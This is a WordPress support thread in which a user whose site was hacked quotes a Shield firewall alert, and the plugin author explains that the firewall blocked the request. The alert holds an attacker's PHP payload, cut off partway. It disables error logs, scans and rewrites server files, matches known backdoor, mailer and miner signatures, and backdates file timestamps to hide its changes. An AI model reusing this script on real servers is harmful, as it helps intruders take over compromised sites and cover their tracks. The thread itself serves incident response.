• Resolved tek428

    (@tek428)


    Hi,

    My website was recently hacked. I thought I had cleaned everything up, but I keep getting this notification in Shield. How can I locate the file that is causing this?

    Page parameter failed firewall check. The offending parameter was \”p1\” with a value of \”@ini_set(\’error_log\’, NULL);\n@ini_set(\’log_errors\’, 0);\n@ini_set(\’max_execution_time\’, 0);\n@error_reporting(0);\n@set_time_limit(0);\n\nfunction list_dir($dir)\n{\n $res = Array();\n\n $dir = strlen($dir) == 1 ? $dir : rtrim($dir, \’\\\\/\’);\n $h = @opendir($dir);\n if ($h === FALSE) {\n return $res;\n }\n\n while (($f = readdir($h)) !== FALSE) {\n if ($f !== \’.\’ and $f !== \’..\’) {\n $res[] = \”$dir/$f\”;\n\n }\n }\n closedir($h);\n\n return $res;\n}\n\nfunction cut_by_markers($content, $start_marker, $end_marker)\n{\n while (($start_marker_pos = strpos($content, $start_marker)) !== FALSE) {\n $end_marker_pos = strpos($content, $end_marker, $start_marker_pos + strlen($start_marker));\n\n if ($end_marker_pos == FALSE) {\n break;\n }\n\n $end_marker_pos += strlen($end_marker);\n $content = str_replace(substr($content, $start_marker_pos, $end_marker_pos – $start_marker_pos), \”\”, $content);\n }\n\n return $content;\n}\n\nfunction GetDirectoryList($dir, $depth = 10000)\n{\n $result = Array();\n $dir_count = 0;\n\n if ($depth == 0) {\n return $result;\n }\n\n foreach (list_dir($dir) as $item) {\n if (is_dir($item)) {\n $dir_count += 1;\n\n if ($dir_count >= $depth) {\n break;\n }\n\n $result[] = $item;\n $result = array_merge($result, GetDirectoryList($item, $depth / 10));\n }\n }\n\n return $result;\n}\n\nfunction process_x225_inj($path)\n{\nreturn;\n $payloads = Array();\n\n $content_arr = @file($path);\n if (empty($content_arr)) {\n return;\n }\n\n $content_arr = array_slice($content_arr, 0, 2);\n for ($i = 0; $i <= 1; $i++) {\n if (!isset($content_arr[$i])) {\n break;\n }\n\n $str = $content_arr[$i];\n if (strlen($str) < 40) {\n continue;\n }\n\n $content2 = str_replace(\”\\\”\”, \”\”, $str);\n $content2 = str_replace(\”.\”, \”\”, $content2);\n $content2 = str_replace(\”\’\”, \”\”, $content2);\n\n if ((strpos($content2, \”_REQUEST\”) !== FALSE || 
strpos($content2, \”_POST\”) !== FALSE || strpos($content2, \”_GET\”) !== FALSE || strpos($content2, \”_COOKIE\”) !== FALSE)) {\n#\n $beg = strpos($str, \”if\”);\n if ($beg !== FALSE) {\n $end = strpos($str, \”xit\”, $beg);\n if ($end !== FALSE && ($end – $beg) < 150) {\n $end = strpos($str, \”}\”, $end);\n\n if ($end !== FALSE) {\n $payload = substr($str, $beg, ($end – $beg) + 1);\n if (strpos($payload, \”HTTP/1.0\”) === FALSE) {\n $payloads[] = $payload;\n echo \”FILE!x225 po3\\t\” . $path . \”\\t\” . $payload . PHP_EOL;\n }\n }\n }\n }\n\n if (strpos($str, \”<\”, $str);\n if (count($str) < 2) {\n continue;\n }\n\n $str = $str[1];\n\n $beg = strpos($str, \”if\”);\n if ($beg !== FALSE) {\n $end = strpos($str, \”xit\”, $beg);\n if ($end !== FALSE && ($end – $beg) < 150) {\n $end = strpos($str, \”}\”, $end);\n\n if ($end !== FALSE) {\n $payload = substr($str, $beg, ($end – $beg) + 1);\n if (strpos($payload, \”HTTP/1.0\”) === FALSE) {\n $payloads[] = $payload;\n echo \”FILE!x225 po3 sp\\t\” . $path . \”\\t\” . $payload . PHP_EOL;\n }\n }\n }\n }\n }\n }\n }\n\n if (count($payloads)) {\n $content = @file_get_contents($path);\n foreach ($payloads as $needle) {\n $content = str_replace($needle, \”\”, $content);\n }\n\n @file_put_contents($path, $content);\n @touch($path, time() – mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));\n }\n}\n\nfunction check_and_patch($path)\n{\n\n $content = @file_get_contents($path);\n\nif (strpos($content, \”z0=\\$_REQUEST[\’sort\’];\\$q1=\’\’;\\$c2=\\\”wt8m4;\”) !== FALSE)\n{\n echo \”FILE! x240 mod\\t\” . $path . PHP_EOL;\n $content = cut_by_markers($content, \”\\$z0=\\$_REQUEST[\”, \”;?\” . \”>\”);\n @file_put_contents($path, $content);\n @touch($path, time() – mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));\n return FALSE;\n}\n\n if (strpos($content, \”if(\\$_GET[\\\”login\\\”]==\\\”ADONEC\\\”){ echo success\”) !== FALSE)\n {\n echo \”FILE! uploader ADONEC\\t\” . $path . 
PHP_EOL;\n return TRUE;\n }\n \n if (strpos($content, \”Uploader By Psyco!\”) !== FALSE)\n {\n echo \”FILE! uploader Psyco\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n \n if (strpos($content, \”die(substr(md5(microtime()), rand(0,26), 5).\\$msg);\”) !== FALSE)\n {\n echo \”FILE! uploader php.input\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n if (strpos($content, \”aWYgKCRfU0VSVkVSWydSRVFVRVNUX01FVEhPRCddID09PSAnUE9TVCcpIH\”) !== FALSE)\n {\n echo \”FILE! backdoor plain payload\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n if (strpos($content, \”_\\$(edocne_46esab\”) !== FALSE && strpos($content, \”_\\$(edoced_46esab\”) !== FALSE)\n {\n echo \”FILE! protected backdoor\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n if (strpos($content, \”if (isset(\\$_GET[\’check_mail_smtp\’])) {\”) !== FALSE && strpos($content, \”SilthxMailer\”) !== FALSE)\n {\n echo \”FILE! mailer Silth\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n if (strpos($content, \”Leaf PHP Mailer by [leafmailer.pw]\”) !== FALSE)\n {\n echo \”FILE! mailer leafmailer\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n \n if (strpos($content, \”\’; @eval(\\$\”) !== FALSE && substr_count($content, \”\’.\’\”) > 2000)\n {\n echo \”FILE! bfm crypt\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n\n $sniff1_string = \” 40 && strpos($content, \” \\$\”) !== FALSE) {\n echo \”FILE!x198\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”=str_replace(\\\”[t1]\\\”, \\\” 90000) {\n echo \”FILE!perl unicode wso\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”file_get_contents(\’http://www.google.com/safebrowsing/diagnostic?output=jsonp&amp;\”) !== FALSE) {\n echo \”FILE!pharm redir\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”\\$smtp_passw, \\$email_polucha, \\$telo_pisma, \\$headers);\”) !== FALSE) {\n echo \”FILE!x225 mailer\\t\” . $path . 
PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”ewogICAgaWYgKCFkZWZpbmVkKCduZXdvOGR3cG9qYXA5Mi0wMzJqZzQzJykpCiAgICB7CiAgIC\”) !== FALSE) {\n echo \”FILE!backdoor 225 snif\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n if (strpos($content, \”ZXZhbChnemluZmxhdGUoYmFzZTY0X2RlY29kZSgielAzbnJ1\”) !== FALSE) {\n echo \”FILE!backdoor comment\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (substr_count($content, \”} . \\$\”) == 36) {\n echo \”FILE!perl wso\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”&api_key=\\$api_key&campaign=xxxcheck&ua=\\$ua&ip=\\$ip&keyword=\”) !== FALSE) {\n echo \”FILE! miner\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”pool.minexmr.com\”) !== FALSE) {\n echo \”FILE! miner\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n $backdoor1 = \”\\$khg= \’_\’.\\\”GE\\\”.\’T\’;if (!empty(\\${\\$khg}[\’15\’])) preg_replace(\’~.*~e\’, \\\”e\\\”.\’V\’.\’al($\’.\\$khg.\'[\\\”15\\\”])\’,\’\’);\”;\n if (strpos($content, $backdoor1) !== FALSE) {\n $content = str_replace($backdoor1, \”\”, $content);\n @file_put_contents($path, $content);\n @touch($path, time() – mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));\n echo \”FILE!x225 emb\\t\” . $path . PHP_EOL;\n return FALSE;\n }\n\n if (strpos($content, \”if(strpos(\\$_REQUEST[\’file2clean\’], \’tell-a-friend.php\’) !== false)\”) !== FALSE) {\n echo \”FILE! backdoor wp\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \” 5) {\n echo \”FILE!PATH backdoor\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”\’PATH\’\”) !== FALSE && substr_count($content, \”_POST\”) >= 4 && strpos($content, \”OS system\”) !== FALSE) {\n echo \”FILE!PATH backdoor2\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”include \\$_SERVER[\\\”DOCUMENT_ROOT\\\”].\\\”/wp-config.php\\\”;\”) !== FALSE) {\n echo \”FILE!db backdoor\\t\” . $path . 
PHP_EOL;\n return TRUE;\n }\n\n if (substr_count($content, \”return \\\”{\\$\”) > 50) {\n echo \”FILE!wso unicode related\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”include \\$_SERVER[\\\”DOCUMENT_ROOT\\\”].\\\”/wp-config.php\\\”;\”) !== FALSE) {\n echo \”FILE!db backdoor\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if ((strpos($content, \”eval\”) !== FALSE || strpos($content, \”preg_replace\”) !== FALSE || strpos($content, \”_REQUEST\”) !== FALSE || strpos($content, \”_PO\”) !== FALSE || strpos($content, \”_CO\”) !== FALSE) && substr_count($content, \”\\n\”) <= 1 && strlen($content) < 200) {\n echo \”FILE!x225 po\\t\” . $path . \”\\t\” . $content . PHP_EOL;\n //patch_file_sniff($path);\n //return FALSE;\n return TRUE;\n }\n\n if (strpos($content, \” }eval(\”) !== FALSE && strpos($content, \”\\$i] = chr(ord(\\$\”) !== FALSE && strpos($content, \”=gzinflate(\\$code($\”) !== FALSE) {\n echo \”FILE!x225 shell\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n $content2 = str_replace(\”\\\”\”, \”\”, $content);\n $content2 = str_replace(\”.\”, \”\”, $content2);\n $content2 = str_replace(\”\’\”, \”\”, $content2);\n\n if ((strpos($content2, \”_REQUEST\”) !== FALSE || strpos($content2, \”_POST\”) !== FALSE || strpos($content2, \”_GET\”) !== FALSE || strpos($content2, \”_COOKIE\”) !== FALSE) && substr_count($content2, \”\\n\”) <= 2 && strlen($content2) < 200) {\n echo \”FILE!x225 po2\\t\” . $path . \”\\t\” . $content . PHP_EOL;\n return TRUE;\n }\n\n if (strlen($content) < 100 && strpos($content, \”@require(\’\”) !== FALSE && strpos($content, \”.php\”) === FALSE) {\n echo \”FILE!doorway4\\t\” . $path . PHP_EOL;\n return TRUE;\n }\n\n if (strpos($content, \”<\” . \”?php @require(\’\”) !== FALSE && FALSE) {\n echo \”FILE!doorway4 patch\\t\” . $path . PHP_EOL;\n $content = str_replace(\”<\” . \”?php @require(\’\”, \”

  • Plugin Author Paul

    (@paultgoodchild)

    This notification doesn’t mean your site is being hacked again.
    Quite the opposite: it means that someone is trying to POST data to your site and the Shield firewall is blocking that request, so there is no local file “causing” it. That said, the blocked value is a complete PHP script (it starts with `@ini_set('error_log', NULL)` and goes on to define functions that walk directories and rewrite files), and sending raw PHP in a request parameter only pays off for the sender if something on the server evaluates it. Since the site was recently compromised, it is worth confirming that no leftover file reads a parameter named `p1` — for example, search the web root for `_POST['p1']`, `_REQUEST['p1']` and `eval(` — and noting the sender’s IP from the Shield log so you can block it.

